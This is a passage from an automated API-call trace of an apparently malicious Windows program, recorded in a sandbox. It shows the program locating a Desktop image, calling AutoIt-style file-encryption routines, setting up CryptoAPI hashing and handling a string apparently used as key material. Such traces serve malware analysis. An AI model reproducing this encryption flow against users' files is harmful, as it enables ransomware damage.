dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\6F5BQoLL3Uym0CamPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.123] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\6F5BQoLL3Uym0CamPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.123] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\6F5BQoLL3Uym0CamPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.123] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\6F5BQoLL3Uym0CamPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.123] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\6F5BQoLL3Uym0CamPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.123] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\6F5BQoLL3Uym0CamPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.123] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\6F5BQoLL3Uym0CamPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.123] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\6F5BQoLL3Uym0CamPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.123] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\6F5BQoLL3Uym0CamPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.123] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\6F5BQoLL3Uym0CamPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.123] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\6F5BQoLL3Uym0CamPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.123] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\6F5BQoLL3Uym0CamPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.123] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\6F5BQoLL3Uym0CamPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.123] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\6F5BQoLL3Uym0CamPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.123] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\6F5BQoLL3Uym0CamPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.123] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6F5BQoLL3Uym0CamPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.123] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F5BQoLL3Uym0CamPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.123] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5BQoLL3Uym0CamPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.123] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BQoLL3Uym0CamPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.123] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QoLL3Uym0CamPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.123] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oLL3Uym0CamPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.123] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LL3Uym0CamPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.123] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L3Uym0CamPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.123] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3Uym0CamPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.123] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Uym0CamPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.123] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ym0CamPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.124] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m0CamPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.124] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0CamPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.124] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CamPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.124] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="amPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.124] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.124] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0076.124] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0076.124] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0076.124] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0076.124] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0076.124] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0076.124] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0076.124] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0076.124] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0076.124] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0076.124] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0076.124] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0076.124] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.124] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6F5BQoLL3Uym0CamPlpJ.jpg", lpFindFileData=0x61e870 | out: lpFindFileData=0x61e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb264fec0, ftCreationTime.dwHighDateTime=0x1d5ddb5, ftLastAccessTime.dwLowDateTime=0xf6077c70, ftLastAccessTime.dwHighDateTime=0x1d5e5fd, ftLastWriteTime.dwLowDateTime=0xf6077c70, ftLastWriteTime.dwHighDateTime=0x1d5e5fd, nFileSizeHigh=0x0, nFileSizeLow=0x13eeb, dwReserved0=0x61e9c0, dwReserved1=0x657690, cFileName="6F5BQoLL3Uym0CamPlpJ.jpg", cAlternateFileName="6F5BQO~1.JPG")) returned 0x6b8b38 [0076.124] FindClose (in: hFindFile=0x6b8b38 | out: hFindFile=0x6b8b38) returned 1 [0076.124] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.124] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0076.125] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.125] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.125] PeekMessageW (in: lpMsg=0x61e7ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e7ac) returned 0 [0076.125] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.125] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77710000 [0076.125] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.125] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.125] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0076.125] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.125] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.125] CryptAcquireContextA (in: phProv=0x61e550, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x61e550*=0x6969c0) returned 1 [0076.126] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0076.126] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0076.126] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0076.127] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0076.127] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.127] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0076.127] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.127] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0076.127] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.127] CryptCreateHash (in: hProv=0x6969c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x61e2c0 | out: phHash=0x61e2c0) returned 1 [0076.127] CharLowerBuffW (in: lpsz="byte[22]", cchLength=0x8 | out: lpsz="byte[22]") returned 0x8 [0076.127] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfe8 | out: hHeap=0x650000) returned 1 [0076.127] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5a8 | out: hHeap=0x650000) returned 1 [0076.127] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0076.127] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0076.127] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6a8 | out: hHeap=0x650000) returned 1 [0076.127] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5d8 | out: hHeap=0x650000) returned 1 [0076.127] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dcc0 | out: hHeap=0x650000) returned 1 [0076.127] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0076.128] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0076.128] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0076.128] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5e8 | out: hHeap=0x650000) returned 1 [0076.128] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0d8 | out: hHeap=0x650000) returned 1 [0076.128] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df18 | out: hHeap=0x650000) returned 1 [0076.128] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb628 | out: hHeap=0x650000) returned 1 [0076.128] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0076.128] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0076.128] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68b480 | out: hHeap=0x650000) returned 1 [0076.128] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0076.128] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0076.128] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0076.128] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0076.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MENQILbzGVCLiQeXEN72f1", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0076.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MENQILbzGVCLiQeXEN72f1", cchWideChar=23, lpMultiByteStr=0x6f9788, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MENQILbzGVCLiQeXEN72f1", lpUsedDefaultChar=0x0) returned 23 [0076.128] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9788 | out: hHeap=0x650000) returned 1 [0076.128] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9768 | out: hHeap=0x650000) returned 1 [0076.128] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0076.128] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfe8 | out: hHeap=0x650000) returned 1 [0076.128] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5e8 | out: hHeap=0x650000) returned 1 [0076.128] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0076.128] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68b480 | out: hHeap=0x650000) returned 1 [0076.128] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0076.128] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0076.128] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6a8 | out: hHeap=0x650000) returned 1 [0076.128] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9728 | out: hHeap=0x650000) returned 1 [0076.128] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0076.128] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0076.128] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df18 | out: hHeap=0x650000) returned 1 [0076.128] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9768 | out: hHeap=0x650000) returned 1 [0076.128] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0076.128] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.129] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0076.129] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0076.129] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0076.129] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0076.129] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b588 | out: hHeap=0x650000) returned 1 [0076.129] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6a8 | out: hHeap=0x650000) returned 1 [0076.129] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0076.129] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0076.129] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0076.129] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0076.129] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0076.129] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0076.129] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0076.129] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0076.129] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df18 | out: hHeap=0x650000) returned 1 [0076.129] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0076.129] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0076.129] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5a8 | out: hHeap=0x650000) returned 1 [0076.129] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68b450 | out: hHeap=0x650000) returned 1 [0076.129] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9728 | out: hHeap=0x650000) returned 1 [0076.129] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0076.129] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df18 | out: hHeap=0x650000) returned 1 [0076.129] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0076.129] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0076.129] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0076.129] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.129] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0076.129] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5a8 | out: hHeap=0x650000) returned 1 [0076.129] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6d8 | out: hHeap=0x650000) returned 1 [0076.129] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0076.129] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6d8 | out: hHeap=0x650000) returned 1 [0076.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5a8 | out: hHeap=0x650000) returned 1 [0076.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0076.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0076.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0076.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5a8 | out: hHeap=0x650000) returned 1 [0076.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6d8 | out: hHeap=0x650000) returned 1 [0076.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0076.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6d8 | out: hHeap=0x650000) returned 1 [0076.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5a8 | out: hHeap=0x650000) returned 1 [0076.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0076.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0076.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0076.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5a8 | out: hHeap=0x650000) returned 1 [0076.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6d8 | out: hHeap=0x650000) returned 1 [0076.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0076.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0076.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x76e078, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0076.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0076.130] GetProcAddress (hModule=0x77710000, lpProcName="CryptHashData") returned 0x7771df36 [0076.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6d8 | out: hHeap=0x650000) returned 1 [0076.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0076.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0076.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5a8 | out: hHeap=0x650000) returned 1 [0076.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0076.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb478 | out: hHeap=0x650000) returned 1 [0076.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dcc0 | out: hHeap=0x650000) returned 1 [0076.130] CryptHashData (hHash=0x6b89f8, pbData=0x6f96a8, dwDataLen=0x16, dwFlags=0x1) returned 1 [0076.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e228 | out: hHeap=0x650000) returned 1 [0076.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0076.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0076.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b000 | out: hHeap=0x650000) returned 1 [0076.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0076.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e228 | out: hHeap=0x650000) returned 1 [0076.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e498 | out: hHeap=0x650000) returned 1 [0076.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0076.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b000 | out: hHeap=0x650000) returned 1 [0076.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0076.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5a8 | out: hHeap=0x650000) returned 1 [0076.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af88 | out: hHeap=0x650000) returned 1 [0076.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad18 | out: hHeap=0x650000) returned 1 [0076.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5a8 | out: hHeap=0x650000) returned 1 [0076.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0076.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0076.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0076.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0076.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0076.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df18 | out: hHeap=0x650000) returned 1 [0076.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e348 | out: hHeap=0x650000) returned 1 [0076.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0076.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0076.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0076.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6a8 | out: hHeap=0x650000) returned 1 [0076.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfe8 | out: hHeap=0x650000) returned 1 [0076.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5e8 | out: hHeap=0x650000) returned 1 [0076.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6f0 | out: 